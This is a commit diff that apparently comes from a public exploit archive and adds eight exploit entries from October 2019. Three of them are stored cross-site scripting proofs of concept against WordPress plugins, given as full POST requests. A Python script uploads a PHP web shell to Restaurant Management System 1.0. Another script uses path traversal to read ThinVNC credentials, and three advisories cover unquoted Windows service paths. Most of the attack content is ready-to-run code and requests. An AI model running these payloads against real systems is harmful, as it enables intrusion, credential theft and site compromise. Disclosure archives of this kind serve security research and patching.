DB: 2019-10-18

8 changes to exploits/shellcodes BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Serive Path ThinVNC 1.0b1 - Authentication Bypass Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting Restaurant Management System 1.0 - Remote Code Execution
2019-10-18 05:01:45 +00:00 · 2019-10-18 05:01:45 +00:00 · 6d83c21135
commit 6d83c21135
parent 588067072a
9 changed files with 356 additions and 0 deletions
--- a/exploits/php/webapps/47516.txt
+++ b/exploits/php/webapps/47516.txt
@ -0,0 +1,44 @@
+# Exploit Title: Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting
+# Google Dork: inurl:"\wp-content\plugins\foogallery"
+# Date: 2019-06-13
+# Exploit Author: Unk9vvN
+# Vendor Homepage: https://foo.gallery/
+# Software Link: https://wordpress.org/plugins/foogallery/
+# Version: 1.8.12
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+# Description
+# This vulnerability is in the validation mode and is located in the plugin settings panel and the vulnerability type is stored ,it happend becuse in setting is an select tag ,this select tag have option with value of title gallerys so simply we just have to break option and write our script tag
+the vulnerability parameters are as follows.
+
+1.Go to the 'add Gallery' of FooGallery
+2.Enter the payload in the "add Title"
+3.Click the "Publish" option
+4.Go to plugin setting of FooGallery
+5.Your payload will run
+
+
+# URI: http://localhost/wordpress/wp-admin/post-new.php?post_type=foogallery&wp-post-new-reload=true
+# Parameter & Payoad: post_title="/><script>alert("Unk9vvn")</script>
+
+
+#
+# POC
+#
+POST /wordpress/wp-admin/post.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=foogallery&wp-post-new-reload=true
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 2694
+Cookie: ......
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+_wpnonce=933471aa43&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dfoogallery&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=foogallery&original_post_status=auto-draft&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Dfoogallery%26ids%3D31&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Dfoogallery%26ids%3D31&auto_draft=&post_ID=32&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvn%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=14&mn=42&ss=45&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=14&cur_hh=14&hidden_mn=42&cur_mn=42&original_publish=Publish&publish=Publish&foogallery_sort=&foogallery_clear_gallery_thumb_cache_nonce=e18d32a542&_thumbnail_id=-1&_foogallery_settings%5Bfoogallery_items_view%5D=manage&foogallery_nonce=b6066e6407&foogallery_attachments=&foogallery_preview=e35a011572&foogallery_template=default&_foogallery_settings%5Bdefault_thumbnail_dimensions%5D%5Bwidth%5D=150&_foogallery_settings%5Bdefault_thumbnail_dimensions%5D%5Bheight%5D=150&_foogallery_settings%5Bdefault_thumbnail_link%5D=image&_foogallery_settings%5Bdefault_lightbox%5D=none&_foogallery_settings%5Bdefault_spacing%5D=fg-gutter-10&_foogallery_settings%5Bdefault_alignment%5D=fg-center&_foogallery_settings%5Bdefault_theme%5D=fg-light&_foogallery_settings%5Bdefault_border_size%5D=fg-border-thin&_foogallery_settings%5Bdefault_rounded_corners%5D=&_foogallery_settings%5Bdefault_drop_shadow%5D=fg-shadow-outline&_foogallery_settings%5Bdefault_inner_shadow%5D=&_foogallery_settings%5Bdefault_loading_icon%5D=fg-loading-default&_foogallery_settings%5Bdefault_loaded_effect%5D=fg-loaded-fade-in&_foogallery_settings%5Bdefault_hover_effect_color%5D=&_foogallery_settings%5Bdefault_hover_effect_scale%5D=&_foogallery_settings%5Bdefault_hover_effect_caption_visibility%5D=fg-caption-hover&_foogallery_settings%5Bdefault_hover_effect_transition%5D=fg-hover-fade&_foogallery_settings%5Bdefault_hover_effect_icon%5D=fg-hover-zoom&_foogallery_settings%5Bdefault_caption_title_source%5D=&_foogallery_settings%5Bdefault_caption_desc_source%5D=&_foogallery_settings%5Bdefault_captions_limit_length%5D=&_foogallery_settings%5Bdefault_paging_type%5D=&_foogallery_settings%5Bdefault_custom_settings%5D=&_foogallery_settings%5Bdefault_custom_attributes%5D=&_foogallery_settings%5Bdefault_lazyload%5D=&post_name=&foogallery_custom_css=
--- a/exploits/php/webapps/47517.txt
+++ b/exploits/php/webapps/47517.txt
@ -0,0 +1,44 @@
+# Exploit Title: Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting
+# Google Dork: inurl:"\wp-content\plugins\soliloquy-lite"
+# Date: 2019-06-13
+# Exploit Author: Unk9vvN
+# Vendor Homepage: https://soliloquywp.com/
+# Software Link: https://wordpress.org/plugins/soliloquy-lite/
+# Version: 2.5.6
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+# Description
+# This vulnerability is in the validation mode and is located in the Prevew of new post inside soliloquy and the vulnerability type is stored ,it happend when a user insert script tag in title input then save the post. everything will be ok until target click on preview of vulnerabil.
+
+1.Go to the 'Add new' section of soliloquy
+2.Enter the payload in the "add Title"
+3.Select a sample image
+4.Click the "Publish" option
+5.Click on Preview
+6.Your payload will run
+
+
+# URI: http://localhost/wordpress/wp-admin/post.php?post=50&action=edit
+# Parameter & Payoad: post_title=&#47;"><script>alert("Unk9vvN")<&#47;script>
+
+
+#
+# POC
+#
+POST /wordpress/wp-admin/post.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/wordpress/wp-admin/post.php?post=50&action=edit
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1599
+Cookie: .......
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+_wpnonce=d9f78b76e2&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D50%26action%3Dedit%26message%3D6&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=soliloquy&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dsoliloquy%26wp-post-new-reload%3Dtrue&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dsoliloquy%26wp-post-new-reload%3Dtrue&post_ID=50&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvN%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&_soliloquy%5Btype%5D=default&async-upload=&post_id=50&soliloquy=bdfd10296c&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D50%26action%3Dedit%26message%3D6&_soliloquy%5Btype_default%5D=1&_soliloquy%5Bslider_theme%5D=base&_soliloquy%5Bslider_width%5D=960&_soliloquy%5Bslider_height%5D=300&_soliloquy%5Btransition%5D=fade&_soliloquy%5Bduration%5D=5000&_soliloquy%5Bspeed%5D=400&_soliloquy%5Bgutter%5D=20&_soliloquy%5Bslider%5D=1&_soliloquy%5Baria_live%5D=polite&_soliloquy%5Btitle%5D=%2F%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&_soliloquy%5Bslug%5D=scriptalert1script&_soliloquy%5Bclasses%5D=&wp-preview=dopreview&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=15&mn=21&ss=21&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=15&cur_hh=15&hidden_mn=21&cur_mn=21&original_publish=Update
--- a/exploits/php/webapps/47518.txt
+++ b/exploits/php/webapps/47518.txt
@ -0,0 +1,44 @@
+# Exploit Title: Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting
+# Google Dork: inurl:"\wp-content\plugins\popupbuilder"
+# Date: 2019-06-13
+# Exploit Author: Unk9vvN
+# Vendor Homepage: https://popup-builder.com/
+# Software Link: https://wordpress.org/plugins/popup-builder/
+# Version: 3.49
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+# Description
+# This vulnerability is in the validation mode and is located in "Add Post" or "Add Page" of wordpress and the vulnerability type is stored ,after install Popup Builder it will make section in Add Post  and Add Page . in this section you will choose which popup show it will create option tag with value of title of the popups, now its easy we just break option tag and insert our script tag inside popup title.
+
+1.Go to the 'Add new' section of Popup Builder
+2.Select Image type
+3.Enter the payload in the "add Title"
+4.Click the "Publish" option
+5.Go to Add New of Page section or Add New of Post section
+6.Your payload will run
+
+
+# URI: http://localhost/wordpress/wp-admin/post-new.php?post_type=popupbuilder&sgpb_type=image&wp-post-new-reload=true
+# Parameter & Payoad: post_title="/><script>alert("Unk9vvN")</script>
+
+
+#
+# POC
+#
+POST /wordpress/wp-admin/post.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/wordpress/wp-admin/post.php?post=39&action=edit
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 2425
+Cookie: ......
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+_wpnonce=8dde4c5262&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=popupbuilder&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit&post_ID=39&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvN%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=15&mn=01&ss=34&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=15&cur_hh=15&hidden_mn=01&cur_mn=03&original_publish=Update&save=Update&tax_input%5Bpopup-categories%5D%5B%5D=0&newpopup-categories=New+Category+Name&newpopup-categories_parent=-1&_ajax_nonce-add-popup-categories=11ba2a6f5c&sgpb-image-url=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-content%2Fuploads%2F2019%2F09%2Fwp2601087.jpg&sgpb-target%5B0%5D%5B0%5D%5Bparam%5D=not_rule&sgpb-type=image&sgpb-is-preview=0&sgpb-is-active=checked&sgpb-events%5B0%5D%5B0%5D%5Bparam%5D=load&sgpb-events%5B0%5D%5B0%5D%5Bvalue%5D=&sgpb-behavior-after-special-events%5B0%5D%5B0%5D%5Bparam%5D=select_event&sgpb-popup-z-index=9999&sgpb-popup-themes=sgpb-theme-1&sgpb-overlay-custom-class=sgpb-popup-overlay&sgpb-overlay-color=&sgpb-overlay-opacity=0.8&sgpb-content-custom-class=sg-popup-content&sgpb-esc-key=on&sgpb-enable-close-button=on&sgpb-close-button-delay=0&sgpb-close-button-position=bottomRight&sgpb-button-position-top=&sgpb-button-position-right=9&sgpb-button-position-bottom=9&sgpb-button-position-left=&sgpb-button-image=&sgpb-button-image-width=21&sgpb-button-image-height=21&sgpb-border-color=%23000000&sgpb-border-radius=0&sgpb-border-radius-type=%25&sgpb-button-text=Close&sgpb-overlay-click=on&sgpb-popup-dimension-mode=responsiveMode&sgpb-responsive-dimension-measure=auto&sgpb-width=640px&sgpb-height=480px&sgpb-max-width=&sgpb-max-height=&sgpb-min-width=120&sgpb-min-height=&sgpb-open-animation-effect=No+effect&sgpb-close-animation-effect=No+effect&sgpb-enable-content-scrolling=on&sgpb-popup-order=0&sgpb-popup-delay=0&post_name=scriptalert1script
--- a/exploits/php/webapps/47520.py
+++ b/exploits/php/webapps/47520.py
@ -0,0 +1,73 @@
+# Exploit Title: Restaurant Management System 1.0  - Remote Code Execution
+# Date: 2019-10-16
+# Exploit Author: Ibad Shah
+# Vendor Homepage: https://www.sourcecodester.com/users/lewa
+# Software Link: https://www.sourcecodester.com/php/11815/restaurant-management-system.html
+# Version: N/A
+# Tested on: Apache 2.4.41
+
+#!/usr/bin/python
+
+import requests
+import sys
+
+print ("""
+    _  _   _____  __  __  _____   ______            _       _ _
+  _| || |_|  __ \|  \/  |/ ____| |  ____|          | |     (_) |
+ |_  __  _| |__) | \  / | (___   | |__  __  ___ __ | | ___  _| |_
+  _| || |_|  _  /| |\/| |\___ \  |  __| \ \/ / '_ \| |/ _ \| | __|
+ |_  __  _| | \ \| |  | |____) | | |____ >  <| |_) | | (_) | | |_
+   |_||_| |_|  \_\_|  |_|_____/  |______/_/\_\ .__/|_|\___/|_|\__|
+                                             | |
+                                             |_|
+
+
+""")
+print ("Credits : All InfoSec (Raja Ji's) Group")
+url = sys.argv[1]
+
+if len(sys.argv[1]) < 8:
+	print("[+] Usage : python rms-rce.py http://localhost:80/")
+	exit()
+	
+print ("[+] Restaurant Management System Exploit, Uploading Shell")
+
+target = url+"admin/foods-exec.php"
+
+
+
+headers = {
+    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0)
+Gecko/20100101 Firefox/69.0",
+    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+    "Accept-Language": "en-US,en;q=0.5",
+    "Accept-Encoding": "gzip, deflate",
+    "Content-Length": "327",
+    "Content-Type": "multipart/form-data;
+boundary=---------------------------191691572411478",
+    "Connection": "close",
+	"Referer": "http://localhost:8081/rms/admin/foods.php",
+	"Cookie": "PHPSESSID=4dmIn4q1pvs4b79",
+	"Upgrade-Insecure-Requests": "1"
+
+}
+
+data = """
+
+-----------------------------191691572411478
+Content-Disposition: form-data; name="photo"; filename="reverse-shell.php"
+Content-Type: text/html
+
+<?php echo shell_exec($_GET["cmd"]); ?>
+-----------------------------191691572411478
+Content-Disposition: form-data; name="Submit"
+
+Add
+-----------------------------191691572411478--
+"""
+r = requests.post(target,verify=False, headers=headers,data=data,
+proxies={"http":"http://127.0.0.1:8080"})
+
+
+print("[+] Shell Uploaded. Please check the URL :
+"+url+"images/reverse-shell.php")
--- a/exploits/windows/local/47521.txt
+++ b/exploits/windows/local/47521.txt
@ -0,0 +1,42 @@
+# Exploit Title: BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path 
+# Exploit Author: Debashis Pal
+# Date: 2019-10-17
+# Vendor : Blackmoonftpserver
+# Source: http://www.tucows.com/preview/222822/BlackMoon-FTP-Server?q=FTP+server
+# Version: BlackMoon FTP Server 3.1.2.1731
+# CVE : N/A
+# Tested on: Windows 7 SP1(64bit), Windows 7 SP1(32bit)
+
+1. Description:
+Unquoted service paths in BlackMoon FTP Server versions 3.1.2.1731 'BMFTP-RELEASE' have an unquoted service path.
+
+2. PoC:
+
+C:\>sc qc BMFTP-RELEASE
+sc qc BMFTP-RELEASE
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: BMFTP-RELEASE
+        TYPE               : 10  WIN32_OWN_PROCESS 
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Selom Ofori\BlackMoon FTP Server\FTPService.exe
+        LOAD_ORDER_GROUP   : 
+        TAG                : 0
+        DISPLAY_NAME       : BlackMoon FTP Service
+        DEPENDENCIES       : 
+        SERVICE_START_NAME : LocalSystem
+
+
+3. Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot.
+If successful, the local user's code would execute with the elevated privileges of the application.
+
+
+
+# Disclaimer
+=============
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
+The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
--- a/exploits/windows/local/47522.txt
+++ b/exploits/windows/local/47522.txt
@ -0,0 +1,39 @@
+# Exploit Title: Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path
+# Exploit Author: Debashis Pal
+# Date: 2019-10-17
+# Vendor Homepage : https://webcompanion.com
+# Source: https://webcompanion.com
+# Version: Web Companion versions 5.1.1035.1047
+# CVE : N/A
+# Tested on: Windows 7 SP1(64bit)
+
+1. Description:
+Web Companion versions 5.1.1035.1047 service 'WCAssistantService' have an unquoted service path.
+
+2. PoC:
+
+C:\>sc qc WCAssistantService
+sc qc WCAssistantService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: WCAssistantService
+        TYPE               : 10  WIN32_OWN_PROCESS 
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
+        LOAD_ORDER_GROUP   : 
+        TAG                : 0
+        DISPLAY_NAME       : WC Assistant
+        DEPENDENCIES       : 
+        SERVICE_START_NAME : LocalSystem
+
+
+3. Exploit:
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot.
+If successful, the local user's code would execute with the elevated privileges of the application.
+
+# Disclaimer
+=============
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
+The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
--- a/exploits/windows/local/47523.txt
+++ b/exploits/windows/local/47523.txt
@ -0,0 +1,23 @@
+# Exploit Title : WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Serive Path
+# Date : 2019-10-15
+# Exploit Author : Cakes
+# Vendor: Softalk
+# Version : 7.5.1
+# Software: http://html.tucows.com/preview/195580/WorkgroupMail-Mail-Server?q=pop3
+# Tested on Windows 10
+# CVE : N/A 
+
+
+c:\>sc qc WorkgroupMail
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: WorkgroupMail
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\WorkgroupMail\wmsvc.exe -s
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : WorkgroupMail
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
--- a/exploits/windows/remote/47519.py
+++ b/exploits/windows/remote/47519.py
@ -0,0 +1,39 @@
+# Exploit Title: ThinVNC 1.0b1 - Authentication Bypass
+# Date: 2019-10-17
+# Exploit Author: Nikhith Tumamlapalli
+# Contributor WarMarX
+# Vendor Homepage: https://sourceforge.net/projects/thinvnc/
+# Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download
+# Version: 1.0b1
+# Tested on: Windows All Platforms
+# CVE : CVE-2019-17662
+
+# Description:
+# Authentication Bypass via Arbitrary File Read
+
+#!/usr/bin/python3
+
+import sys
+import os
+import requests
+
+def exploit(host,port):
+    url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini"
+    r = requests.get(url)
+    body = r.text
+    print(body.splitlines()[2])
+    print(body.splitlines()[3])
+
+
+
+def main():
+    if(len(sys.argv)!=3):
+        print("Usage:\n{} <host> <port>\n".format(sys.argv[0]))
+        print("Example:\n{} 192.168.0.10 5888")
+    else:
+        port = sys.argv[2]
+        host = sys.argv[1]
+        exploit(host,port)
+
+if __name__ == '__main__':
+    main()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10724,6 +10724,9 @@ id,file,description,date,author,type,platform,port
 47508,exploits/windows/local/47508.txt,"LiteManager 4.5.0 - 'romservice' Unquoted Serive Path",2019-10-16,cakes,local,windows,
 47509,exploits/solaris/local/47509.txt,"Solaris xscreensaver 11.4 - Privilege Escalation",2019-10-16,"Marco Ivaldi",local,solaris,
 47510,exploits/windows/local/47510.txt,"Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path",2019-10-16,cakes,local,windows,
+47521,exploits/windows/local/47521.txt,"BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path",2019-10-17,"Debashis Pal",local,windows,
+47522,exploits/windows/local/47522.txt,"Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path",2019-10-17,"Debashis Pal",local,windows,
+47523,exploits/windows/local/47523.txt,"WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Serive Path",2019-10-17,cakes,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17723,6 +17726,7 @@ id,file,description,date,author,type,platform,port
 47472,exploits/windows/remote/47472.py,"freeFTP 1.0.8 - 'PASS' Remote Buffer Overflow",2019-10-07,"Chet Manly",remote,windows,
 47500,exploits/linux/remote/47500.py,"Podman & Varlink 1.5.1 - Remote Code Execution",2019-10-15,"Jeremy Brown",remote,linux,
 47515,exploits/android/remote/47515.cpp,"Whatsapp 2.19.216 - Remote Code Execution",2019-10-16,"Valerio Brussani",remote,android,
+47519,exploits/windows/remote/47519.py,"ThinVNC 1.0b1 - Authentication Bypass",2019-10-17,"Nikhith Tumamlapalli",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41841,3 +41845,7 @@ id,file,description,date,author,type,platform,port
 47501,exploits/php/webapps/47501.txt,"Bolt CMS 3.6.10 - Cross-Site Request Forgery",2019-10-15,r3m0t3nu11,webapps,php,
 47505,exploits/php/webapps/47505.txt,"Accounts Accounting 7.02 - Persistent Cross-Site Scripting",2019-10-16,"Debashis Pal",webapps,php,
 47512,exploits/linux/webapps/47512.txt,"CyberArk Password Vault 10.6 - Authentication Bypass",2019-10-16,"Daniel Martinez Adan",webapps,linux,
+47516,exploits/php/webapps/47516.txt,"Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
+47517,exploits/php/webapps/47517.txt,"Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
+47518,exploits/php/webapps/47518.txt,"Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
+47520,exploits/php/webapps/47520.py,"Restaurant Management System 1.0  - Remote Code Execution",2019-10-17,"Ibad Shah",webapps,php,